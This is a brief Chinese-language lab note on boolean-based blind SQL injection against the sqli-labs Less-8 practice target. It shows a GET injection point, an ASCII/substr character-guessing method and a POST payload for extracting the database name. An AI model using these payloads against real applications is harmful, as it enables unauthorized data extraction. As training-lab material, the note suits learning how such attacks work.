Sql Inject Less 8 盲注基于布尔型

实验

基于布尔类型注入其实就是根据布尔值来判断获取的ascill码的数值来进行注入的方式。


注入点,例:http://192.168.230.130/trainer/Less-8/?id=1' AND 1 --+

0是false 1为true


举例,目前使用的数据库为:security

select ASCII(substr(DATABASE(),8,8))

s 115

e 101

c 99

u 117

r 114

i 105

t 116

y 121


测试:

当我取第一个ascii码值,判断他大于114时,此时为false,判断true和false的依据为【You are in...】是否显示。


数据库第一个字符判断是否大于116,是false。

大于114 小于116 ,明显就是115了,也就是Security里的S字符。


这种明显效率低下。远远不如使用 group_concat 函数来的直接,非快速获取大量信息的方式。


POST注入,基于布尔值

POST注入其实和GET是一样的,都是基于布尔值来判断具体的ascii码值

payload:1") or substr(DATABASE(),1,1) ='s' #

评论